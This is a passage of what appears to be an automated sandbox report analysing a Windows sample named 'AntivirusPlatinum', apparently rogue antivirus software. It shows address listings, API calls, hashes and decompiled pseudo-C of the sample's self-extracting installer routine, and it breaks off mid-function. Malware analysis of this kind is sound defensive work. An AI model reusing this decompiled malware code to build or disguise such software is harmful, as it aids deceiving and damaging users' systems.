                                                                                                                                                      0x0040c408
                                                                                                                                                      0x0040c40a
                                                                                                                                                      0x0040c36e
                                                                                                                                                      0x0040c376
                                                                                                                                                      0x0040c37b
                                                                                                                                                      0x0040c37d
                                                                                                                                                      0x0040c384
                                                                                                                                                      0x0040c389
                                                                                                                                                      0x0040c38b
                                                                                                                                                      0x0040c38d
                                                                                                                                                      0x0040c391
                                                                                                                                                      0x0040c393
                                                                                                                                                      0x0040c393
                                                                                                                                                      0x0040c391
                                                                                                                                                      0x0040c39e
                                                                                                                                                      0x0040c3aa
                                                                                                                                                      0x0040c3ba
                                                                                                                                                      0x0040c3c4
                                                                                                                                                      0x0040c3d3
                                                                                                                                                      0x0040c3d9
                                                                                                                                                      0x0040c3e1
                                                                                                                                                      0x0040c3e6
                                                                                                                                                      0x0040c3e8
                                                                                                                                                      0x0040c3fd
                                                                                                                                                      0x0040c3fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c3e8
                                                                                                                                                      0x0040c410
                                                                                                                                                      0x0040c412
                                                                                                                                                      0x0040c41e
                                                                                                                                                      0x0040c41e
                                                                                                                                                      0x0040c430
                                                                                                                                                      0x0040c436
                                                                                                                                                      0x0040c438
                                                                                                                                                      0x0040c43e
                                                                                                                                                      0x0040c445
                                                                                                                                                      0x0040c453
                                                                                                                                                      0x0040c463
                                                                                                                                                      0x0040c463
                                                                                                                                                      0x0040c469
                                                                                                                                                      0x0040c470
                                                                                                                                                      0x0040c472
                                                                                                                                                      0x0040c479
                                                                                                                                                      0x0040c47e
                                                                                                                                                      0x0040c484
                                                                                                                                                      0x0040c485
                                                                                                                                                      0x0040c489
                                                                                                                                                      0x0040c497
                                                                                                                                                      0x0040c497
                                                                                                                                                      0x0040c489
                                                                                                                                                      0x0040c4a2
                                                                                                                                                      0x0040c4a4
                                                                                                                                                      0x0040c4b0
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c4c6
                                                                                                                                                      0x0040c4c6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c414
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c418
                                                                                                                                                      0x0040c361
                                                                                                                                                      0x0040c365
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4d0
                                                                                                                                                      0x0040c4d1
                                                                                                                                                      0x0040c4d6
                                                                                                                                                      0x0040c4d8
                                                                                                                                                      0x0040c4db
                                                                                                                                                      0x0040c4db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c511
                                                                                                                                                      0x0040c518
                                                                                                                                                      0x0040c518
                                                                                                                                                      0x0040c51b
                                                                                                                                                      0x0040c548
                                                                                                                                                      0x0040c548
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c51d
                                                                                                                                                      0x0040c51d
                                                                                                                                                      0x0040c520
                                                                                                                                                      0x0040c535
                                                                                                                                                      0x0040c53c
                                                                                                                                                      0x0040c53c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c53c
                                                                                                                                                      0x0040c522
                                                                                                                                                      0x0040c522
                                                                                                                                                      0x0040c523
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c525
                                                                                                                                                      0x0040c525
                                                                                                                                                      0x0040c526
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c52c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c59d
                                                                                                                                                      0x0040c5a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5a7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5b9
                                                                                                                                                      0x0040c5bd
                                                                                                                                                      0x0040c71c
                                                                                                                                                      0x0040c71c
                                                                                                                                                      0x0040c720
                                                                                                                                                      0x0040c726
                                                                                                                                                      0x0040c72d
                                                                                                                                                      0x0040c72f
                                                                                                                                                      0x0040c72f
                                                                                                                                                      0x0040c739
                                                                                                                                                      0x0040c739
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c720
                                                                                                                                                      0x0040c5cf
                                                                                                                                                      0x0040c5dc
                                                                                                                                                      0x0040c5e1
                                                                                                                                                      0x0040c5e5
                                                                                                                                                      0x0040c5e7
                                                                                                                                                      0x0040c5f4
                                                                                                                                                      0x0040c5f4
                                                                                                                                                      0x0040c5fa
                                                                                                                                                      0x0040c600
                                                                                                                                                      0x0040c601
                                                                                                                                                      0x0040c607
                                                                                                                                                      0x0040c608
                                                                                                                                                      0x0040c609
                                                                                                                                                      0x0040c60b
                                                                                                                                                      0x0040c60e
                                                                                                                                                      0x0040c614
                                                                                                                                                      0x0040c615
                                                                                                                                                      0x0040c617
                                                                                                                                                      0x0040c61a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5ee
                                                                                                                                                      0x0040c5f1
                                                                                                                                                      0x0040c5f1
                                                                                                                                                      0x0040c628
                                                                                                                                                      0x0040c62e
                                                                                                                                                      0x0040c635
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c63b
                                                                                                                                                      0x0040c642
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c64a
                                                                                                                                                      0x0040c651
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c65d
                                                                                                                                                      0x0040c65f
                                                                                                                                                      0x0040c69f
                                                                                                                                                      0x0040c69f
                                                                                                                                                      0x0040c6a6
                                                                                                                                                      0x0040c6af
                                                                                                                                                      0x0040c6bb
                                                                                                                                                      0x0040c6c9
                                                                                                                                                      0x0040c6c9
                                                                                                                                                      0x0040c6d5
                                                                                                                                                      0x0040c6e3
                                                                                                                                                      0x0040c6ed
                                                                                                                                                      0x0040c6f4
                                                                                                                                                      0x0040c6fa
                                                                                                                                                      0x0040c6fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c703
                                                                                                                                                      0x0040c705
                                                                                                                                                      0x0040c705
                                                                                                                                                      0x0040c70a
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c716
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c716
                                                                                                                                                      0x0040c6fd
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x0040c66a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c66c
                                                                                                                                                      0x0040c674
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c676
                                                                                                                                                      0x0040c677
                                                                                                                                                      0x0040c67f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c68b
                                                                                                                                                      0x0040c692
                                                                                                                                                      0x0040c697
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c745
                                                                                                                                                      0x0040c749
                                                                                                                                                      0x0040c74b
                                                                                                                                                      0x0040c752
                                                                                                                                                      0x0040c75e
                                                                                                                                                      0x0040c75e
                                                                                                                                                      0x0040c764
                                                                                                                                                      0x0040c76c
                                                                                                                                                      0x0040c76c
                                                                                                                                                      0x0040c771
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c77d
                                                                                                                                                      0x0040c781
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c5a9
                                                                                                                                                      0x0040c5af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c78e
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c7a0
                                                                                                                                                      0x0040c7a5
                                                                                                                                                      0x0040c7a5
                                                                                                                                                      0x0040c7a8
                                                                                                                                                      0x0040c7cd
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7aa
                                                                                                                                                      0x0040c7ad
                                                                                                                                                      0x0040c7c4
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c7b0
                                                                                                                                                      0x0040c7bb
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b2
                                                                                                                                                      0x0040c7b0
                                                                                                                                                      0x0040c7ad
                                                                                                                                                      0x0040c7db
                                                                                                                                                      0x0040c7e2
                                                                                                                                                      0x0040c7e9
                                                                                                                                                      0x0040c7f0
                                                                                                                                                      0x0040c7f5
                                                                                                                                                      0x0040c7fc
                                                                                                                                                      0x0040c846
                                                                                                                                                      0x0040c84b
                                                                                                                                                      0x0040c84d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c84f
                                                                                                                                                      0x0040c851
                                                                                                                                                      0x0040c858
                                                                                                                                                      0x0040c85e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x0040c862
                                                                                                                                                      0x0040c865
                                                                                                                                                      0x0040c86c
                                                                                                                                                      0x0040c86e
                                                                                                                                                      0x0040c875
                                                                                                                                                      0x0040c878
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c87f
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8b1
                                                                                                                                                      0x0040c881
                                                                                                                                                      0x0040c883
                                                                                                                                                      0x0040c886
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c8a0
                                                                                                                                                      0x0040c8a1
                                                                                                                                                      0x0040c8a7
                                                                                                                                                      0x0040c8a7
                                                                                                                                                      0x0040c8a8
                                                                                                                                                      0x0040c8ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8ad
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c888
                                                                                                                                                      0x0040c88b
                                                                                                                                                      0x0040c88c
                                                                                                                                                      0x0040c892
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c892
                                                                                                                                                      0x0040c867
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c8b3
                                                                                                                                                      0x0040c8b3
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8bb
                                                                                                                                                      0x0040c8bd
                                                                                                                                                      0x0040c8bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7fe
                                                                                                                                                      0x0040c805
                                                                                                                                                      0x0040c813
                                                                                                                                                      0x0040c81a
                                                                                                                                                      0x0040c81f
                                                                                                                                                      0x0040c821
                                                                                                                                                      0x0040c827
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c8c0
                                                                                                                                                      0x0040c8c0
                                                                                                                                                      0x0040c8c7
                                                                                                                                                      0x0040c8d0
                                                                                                                                                      0x0040c8d7
                                                                                                                                                      0x0040c8d7
                                                                                                                                                      0x0040c8e3
                                                                                                                                                      0x0040c8f2
                                                                                                                                                      0x0040c8f9
                                                                                                                                                      0x0040c905
                                                                                                                                                      0x0040c90a
                                                                                                                                                      0x0040c911
                                                                                                                                                      0x0040c91a
                                                                                                                                                      0x0040c926
                                                                                                                                                      0x0040c92d
                                                                                                                                                      0x0040c92d
                                                                                                                                                      0x0040c939
                                                                                                                                                      0x0040c940
                                                                                                                                                      0x0040c945
                                                                                                                                                      0x0040c94c
                                                                                                                                                      0x0040c952
                                                                                                                                                      0x0040c954
                                                                                                                                                      0x0040c954
                                                                                                                                                      0x0040c968
                                                                                                                                                      0x0040c96d
                                                                                                                                                      0x0040c974
                                                                                                                                                      0x0040c979
                                                                                                                                                      0x0040c97b
                                                                                                                                                      0x0040c98c
                                                                                                                                                      0x0040c998
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c97d
                                                                                                                                                      0x0040c983
                                                                                                                                                      0x0040c988
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c99d
                                                                                                                                                      0x0040c9a8
                                                                                                                                                      0x0040c9b4
                                                                                                                                                      0x0040c9b6
                                                                                                                                                      0x0040c9b8
                                                                                                                                                      0x0040c9c1
                                                                                                                                                      0x0040c9c8
                                                                                                                                                      0x0040c9ca
                                                                                                                                                      0x0040c9cc
                                                                                                                                                      0x0040c9d5
                                                                                                                                                      0x0040c9dc
                                                                                                                                                      0x0040c9de
                                                                                                                                                      0x0040c9e0
                                                                                                                                                      0x0040c9e9
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x0040c9fc
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x0040ca07
                                                                                                                                                      0x0040ca15
                                                                                                                                                      0x0040ca15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c97b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca1d
                                                                                                                                                      0x0040ca21
                                                                                                                                                      0x0040ca23
                                                                                                                                                      0x0040ca23
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c563
                                                                                                                                                      0x0040c568
                                                                                                                                                      0x0040c56b
                                                                                                                                                      0x0040c591
                                                                                                                                                      0x0040c56d
                                                                                                                                                      0x0040c56d
                                                                                                                                                      0x0040c570
                                                                                                                                                      0x0040c585
                                                                                                                                                      0x0040c572
                                                                                                                                                      0x0040c572
                                                                                                                                                      0x0040c579
                                                                                                                                                      0x0040c579
                                                                                                                                                      0x0040c570
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c008
                                                                                                                                                      0x0040c00c
                                                                                                                                                      0x0040c011
                                                                                                                                                      0x0040c018
                                                                                                                                                      0x0040c018
                                                                                                                                                      0x0040c01b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c01d
                                                                                                                                                      0x0040ca2a
                                                                                                                                                      0x0040ca48
                                                                                                                                                      0x0040ca4d
                                                                                                                                                      0x0040ca50
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca59

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B613: ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFD4,00000000,?,?,?,?,?,?,0040D24D,?), ref: 0040B6BB
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C032
                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000400,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0041A818,0041A824,?), ref: 0040C074
                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C0FE
                                                                                                                                                      • SHFileOperationA.SHELL32(?,?,00000000), ref: 0040C1B5
                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 0040C1C2
                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C1D0
                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040C308
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040C3B4
                                                                                                                                                      • SetWindowTextA.USER32(00000000,00000000), ref: 0040C3C4
                                                                                                                                                      • SendMessageA.USER32 ref: 0040C3D3
                                                                                                                                                      • SendMessageA.USER32 ref: 0040C3FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesMessageSendTextWindow$CurrentDeleteDirectoryEnvironmentExpandItemOperationStringslstrcmpi
                                                                                                                                                      • String ID: "$%s.%d.tmp$<br>$C:\WINDOWS$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                      • API String ID: 297094968-4244017151
                                                                                                                                                      • Opcode ID: d36ffacd43a2f8a78fecda516e75c7e09bd54960045749e9d3b70807280ed642
                                                                                                                                                      • Instruction ID: 26b2c8a04a2213872833e54c54379dca27802e9aad8b41e31b2901df3c031a3a
                                                                                                                                                      • Opcode Fuzzy Hash: d36ffacd43a2f8a78fecda516e75c7e09bd54960045749e9d3b70807280ed642
                                                                                                                                                      • Instruction Fuzzy Hash: 84E13CB1901219EADB21EBA0CD85FDE77BCAB04304F4081B7AA05F21D1DB78AB55CF59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E0040D33C() {
                                                                                                                                                      				char _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v40;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				int _t28;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      				struct HINSTANCE__* _t56;
                                                                                                                                                      				CHAR* _t57;
                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                      				int _t65;
                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                      
                                                                                                                                                      				__imp__OleInitialize(0); // executed
                                                                                                                                                      				E0040E428(0x41fdc0);
                                                                                                                                                      				_t57 = GetCommandLineA();
                                                                                                                                                      				_t60 = _t57;
                                                                                                                                                      				if(_t57 != 0) {
                                                                                                                                                      					E0040B485(0x41fdc0, _t60, _t57);
                                                                                                                                                      					SetEnvironmentVariableA("sfxcmd", _t57); // executed
                                                                                                                                                      				}
                                                                                                                                                      				GetModuleFileNameA(0, 0x419ad8, 0x400);
                                                                                                                                                      				SetEnvironmentVariableA("sfxname", 0x419ad8); // executed
                                                                                                                                                      				if(E00406EA5() == 0) {
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					 *0x4192d8 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					GetModuleFileNameW(0, "C:\Users\hardz\Desktop\Endermanch@AntivirusPlatinum.exe", 0x400);
                                                                                                                                                      				}
                                                                                                                                                      				_t56 = GetModuleHandleA(0);
                                                                                                                                                      				 *0x414c78 = _t56; // executed
                                                                                                                                                      				_t18 = LoadIconA(_t56, 0x64); // executed
                                                                                                                                                      				 *0x4192d4 = _t18;
                                                                                                                                                      				 *0x4192d0 = LoadBitmapA( *0x414c78, 0x65); // executed
                                                                                                                                                      				E00411585( &_v12); // executed
                                                                                                                                                      				E004098E0(0, 0x414c88, _t54, 0x419ad8);
                                                                                                                                                      				E00406479( &_v68);
                                                                                                                                                      				E00406479( &_v40);
                                                                                                                                                      				_v44 = E0040ACA1(0x64);
                                                                                                                                                      				_v16 = E0040ACA1(0x64);
                                                                                                                                                      				 *0x418ecc =  &_v68;
                                                                                                                                                      				 *0x418ec8 =  &_v40; // executed
                                                                                                                                                      				_t28 = DialogBoxParamA(_t56, "STARTDLG", 0, E0040CC24, 0); // executed
                                                                                                                                                      				 *0x419f80 = 0;
                                                                                                                                                      				 *0x418ec8 = 0;
                                                                                                                                                      				 *0x418ecc = 0;
                                                                                                                                                      				E0040648F(E0040648F(_t28,  &_v40),  &_v68);
                                                                                                                                                      				_t52 =  &_v12;
                                                                                                                                                      				E004115FD( &_v12);
                                                                                                                                                      				_t62 =  *0x419f88; // 0x0
                                                                                                                                                      				if(_t62 != 0) {
                                                                                                                                                      					E0040B729( &_v12);
                                                                                                                                                      				}
                                                                                                                                                      				E0040A289(_t52, 0x419ee8, 0, 0x80);
                                                                                                                                                      				if( *0x41a824 > 0) {
                                                                                                                                                      					E0040A205( *0x41a818);
                                                                                                                                                      				}
                                                                                                                                                      				DeleteObject( *0x4192d4);
                                                                                                                                                      				_t34 =  *0x4192d0; // 0xec050b71
                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                      					DeleteObject(_t34);
                                                                                                                                                      				}
                                                                                                                                                      				_t65 =  *0x414c7c; // 0x0
                                                                                                                                                      				if(_t65 == 0) {
                                                                                                                                                      					_t66 =  *0x419f78; // 0x2
                                                                                                                                                      					if(_t66 != 0) {
                                                                                                                                                      						E0040325C(0x414c7c, 0xff);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t35 =  *0x41a828;
                                                                                                                                                      				 *0x419f78 = 2;
                                                                                                                                                      				if( *0x41a828 != 0) {
                                                                                                                                                      					E0040B6EA(_t35); // executed
                                                                                                                                                      				}
                                                                                                                                                      				"0+&u@uxv"(); // executed
                                                                                                                                                      				ExitProcess( *0x414c7c);
                                                                                                                                                      			}

















                                                                                                                                                      0x0040d348
                                                                                                                                                      0x0040d353
                                                                                                                                                      0x0040d364
                                                                                                                                                      0x0040d366
                                                                                                                                                      0x0040d368
                                                                                                                                                      0x0040d36b
                                                                                                                                                      0x0040d376
                                                                                                                                                      0x0040d376
                                                                                                                                                      0x0040d384
                                                                                                                                                      0x0040d390
                                                                                                                                                      0x0040d399
                                                                                                                                                      0x0040d3ae
                                                                                                                                                      0x0040d3b0
                                                                                                                                                      0x0040d39b
                                                                                                                                                      0x0040d3a6
                                                                                                                                                      0x0040d3a6
                                                                                                                                                      0x0040d3bd
                                                                                                                                                      0x0040d3c2
                                                                                                                                                      0x0040d3c8
                                                                                                                                                      0x0040d3d6
                                                                                                                                                      0x0040d3e4
                                                                                                                                                      0x0040d3e9
                                                                                                                                                      0x0040d3f4
                                                                                                                                                      0x0040d3fc
                                                                                                                                                      0x0040d404
                                                                                                                                                      0x0040d412
                                                                                                                                                      0x0040d420
                                                                                                                                                      0x0040d427
                                                                                                                                                      0x0040d435
                                                                                                                                                      0x0040d43a
                                                                                                                                                      0x0040d443
                                                                                                                                                      0x0040d449
                                                                                                                                                      0x0040d44f
                                                                                                                                                      0x0040d45d
                                                                                                                                                      0x0040d462
                                                                                                                                                      0x0040d465
                                                                                                                                                      0x0040d46a
                                                                                                                                                      0x0040d470
                                                                                                                                                      0x0040d472
                                                                                                                                                      0x0040d472
                                                                                                                                                      0x0040d482
                                                                                                                                                      0x0040d48d
                                                                                                                                                      0x0040d495
                                                                                                                                                      0x0040d495
                                                                                                                                                      0x0040d4a6
                                                                                                                                                      0x0040d4a8
                                                                                                                                                      0x0040d4af
                                                                                                                                                      0x0040d4b2
                                                                                                                                                      0x0040d4b2
                                                                                                                                                      0x0040d4b4
                                                                                                                                                      0x0040d4ba
                                                                                                                                                      0x0040d4bc
                                                                                                                                                      0x0040d4c2
                                                                                                                                                      0x0040d4ce
                                                                                                                                                      0x0040d4ce
                                                                                                                                                      0x0040d4c2
                                                                                                                                                      0x0040d4d3
                                                                                                                                                      0x0040d4d8
                                                                                                                                                      0x0040d4e4
                                                                                                                                                      0x0040d4e7
                                                                                                                                                      0x0040d4e7
                                                                                                                                                      0x0040d4ec
                                                                                                                                                      0x0040d4f8

                                                                                                                                                      APIs
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040D348
                                                                                                                                                        • Part of subcall function 0040E428: GetCPInfo.KERNEL32(00000000,?,?,00000000,?,?,0040E4E2,?,0040A6E8), ref: 0040E439
                                                                                                                                                        • Part of subcall function 0040E428: IsDBCSLeadByte.KERNEL32(00000000,?,00000000), ref: 0040E44D
                                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 0040D358
                                                                                                                                                      • SetEnvironmentVariableA.KERNELBASE(sfxcmd,00000000,00000000), ref: 0040D376
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,00000400), ref: 0040D384
                                                                                                                                                      • SetEnvironmentVariableA.KERNELBASE(sfxname,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040D390
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,00000400), ref: 0040D3A6
                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040D3B7
                                                                                                                                                      • LoadIconA.USER32(00000000,00000064), ref: 0040D3C8
                                                                                                                                                      • LoadBitmapA.USER32 ref: 0040D3DB
                                                                                                                                                      • DialogBoxParamA.USER32 ref: 0040D43A
                                                                                                                                                      • DeleteObject.GDI32(00419EE8), ref: 0040D4A6
                                                                                                                                                      • DeleteObject.GDI32(EC050B71), ref: 0040D4B2
                                                                                                                                                      • OleUninitialize.OLE32(?), ref: 0040D4EC
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D4F8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Module$DeleteEnvironmentFileLoadNameObjectVariable$BitmapByteCommandDialogExitHandleIconInfoInitializeLeadLineParamProcessUninitialize
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$STARTDLG$sfxcmd$sfxname$|LA
                                                                                                                                                      • API String ID: 2002691505-1958165797
                                                                                                                                                      • Opcode ID: a64e9b8bb87abff073727f12cb01139305408d7666d82abbf9609f215f0c5f05
                                                                                                                                                      • Instruction ID: 1b9db9b8f4c8a255ada22d75d2d3daf09faad69adfa1b9a70ca480eaf30b4961
                                                                                                                                                      • Opcode Fuzzy Hash: a64e9b8bb87abff073727f12cb01139305408d7666d82abbf9609f215f0c5f05
                                                                                                                                                      • Instruction Fuzzy Hash: A7416170940305BBD700BFB1DD999EA3AA8EB44305B15843FF601B22E1DB785C55CB6E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E00403A34(void* __ecx, void* __edx, intOrPtr _a4, char _a7, char* _a8, char _a11, intOrPtr _a12, signed int _a15) {
                                                                                                                                                      				signed int _v5;
                                                                                                                                                      				signed char* _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _v21;
                                                                                                                                                      				signed int _v25;
                                                                                                                                                      				char _v26;
                                                                                                                                                      				char _v1052;
                                                                                                                                                      				char _v3108;
                                                                                                                                                      				char _v4133;
                                                                                                                                                      				char _v4137;
                                                                                                                                                      				char _v4156;
                                                                                                                                                      				char _v6204;
